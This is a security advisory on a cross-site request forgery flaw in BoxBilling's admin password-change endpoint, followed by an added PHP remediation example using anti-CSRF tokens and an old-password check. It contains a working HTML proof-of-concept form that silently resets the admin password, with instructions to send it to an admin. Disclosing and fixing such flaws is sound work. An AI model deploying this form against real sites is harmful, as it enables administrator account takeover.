Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling
Jul 5th 2021
CSRF on changing the password of an admin account. There is no anti-CSRF token implemented on the endpoint.
Proof of Concept
Create a .html file (for example poc.html) and paste the following code into it. Change localhost to your domain or IP address.
<html>
<head>
  <title>CSRF PoC</title>
</head>
<body>
  <form action="http://localhost/box/api/admin/profile/change_password" method="POST">
    <input type="hidden" name="password" value="changeme1" /><br />
    <input type="hidden" name="password_confirm" value="changeme1" /><br />
    <input type='submit' value='Click here' />
  </form>
</body>
</html>
Send this file to an admin; when he opens it and clicks the button, the password will be changed to changeme1. See the screenshot below with a Burp request showing what happens.
This vulnerability allows the admin password to be changed to a new one. If you send the admin the link and he clicks on it, the password is changed directly because there is no CSRF protection. With this attack you can become an admin on the website.
Verify the old_password first.
Implement anti-CSRF protection.
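The two remediation points above, worked through as an added PHP example (this is not BoxBilling's own code; the handler signature, the session layout, the `csrf_token` field name and the admin record are assumptions). It shows the synchronizer-token pattern: a random token is stored server-side in the session and embedded in the form, and the change_password handler rejects any request that does not carry it, then additionally requires the current password before accepting a new one.

```php
<?php
// Added example, not BoxBilling code: synchronizer-token CSRF protection
// plus an old_password check for a change_password endpoint.
// Assumptions: $session is the server-side session array, $post is the
// decoded POST body, $adminRecord holds the admin's password hash.
declare(strict_types=1);

// Issue (or reuse) a per-session anti-CSRF token. Because it lives in the
// session and is only ever sent to the admin's own browser, a page on
// another origin cannot learn it and so cannot forge a valid request.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_verify(array $session, ?string $submitted): bool
{
    return isset($session['csrf_token'], $submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

// Markup the legitimate admin form would use: the token travels in a
// hidden field, which the forged PoC form above cannot populate.
function render_form(string $token): string
{
    $safe = htmlspecialchars($token, ENT_QUOTES, 'UTF-8');
    return '<form method="POST" action="/box/api/admin/profile/change_password">'
        . '<input type="hidden" name="csrf_token" value="' . $safe . '">'
        . '<input type="password" name="old_password">'
        . '<input type="password" name="password">'
        . '<input type="password" name="password_confirm">'
        . '<input type="submit" value="Change password"></form>';
}

// Hardened handler. Returns a status string so the logic can be exercised
// without a web server.
function change_password(array $session, array $post, array &$adminRecord): string
{
    // 1. Anti-CSRF: refuse any request without the session's token.
    if (!csrf_verify($session, $post['csrf_token'] ?? null)) {
        return 'forbidden: missing or invalid CSRF token';
    }
    // 2. Verify the old password before allowing a change.
    if (!isset($post['old_password'])
        || !password_verify($post['old_password'], $adminRecord['pass'])) {
        return 'forbidden: old_password does not match';
    }
    // 3. Keep the existing confirmation check.
    $new = $post['password'] ?? '';
    if ($new === '' || $new !== ($post['password_confirm'] ?? null)) {
        return 'error: passwords do not match';
    }
    $adminRecord['pass'] = password_hash($new, PASSWORD_DEFAULT);
    return 'ok';
}

// Constructed demonstration: the forged PoC body (no token, no old password)
// versus a legitimate submission from the rendered form.
$session = [];
$token   = csrf_token($session);
$admin   = ['pass' => password_hash('correct horse', PASSWORD_DEFAULT)];

$forged = ['password' => 'changeme1', 'password_confirm' => 'changeme1'];
echo change_password($session, $forged, $admin), PHP_EOL;

$legit = $forged + ['csrf_token' => $token, 'old_password' => 'correct horse'];
echo change_password($session, $legit, $admin), PHP_EOL;
```

Run with `php poc_fix.php`: the first call is rejected for lacking a token, the second succeeds. The token check alone closes the CSRF; the old_password check is defence in depth, so that a request that somehow rides the admin's session still cannot rotate the credential without knowing it. Marking the session cookie `SameSite=Lax` or `Strict` is a further layer browsers enforce, but it does not replace the server-side token.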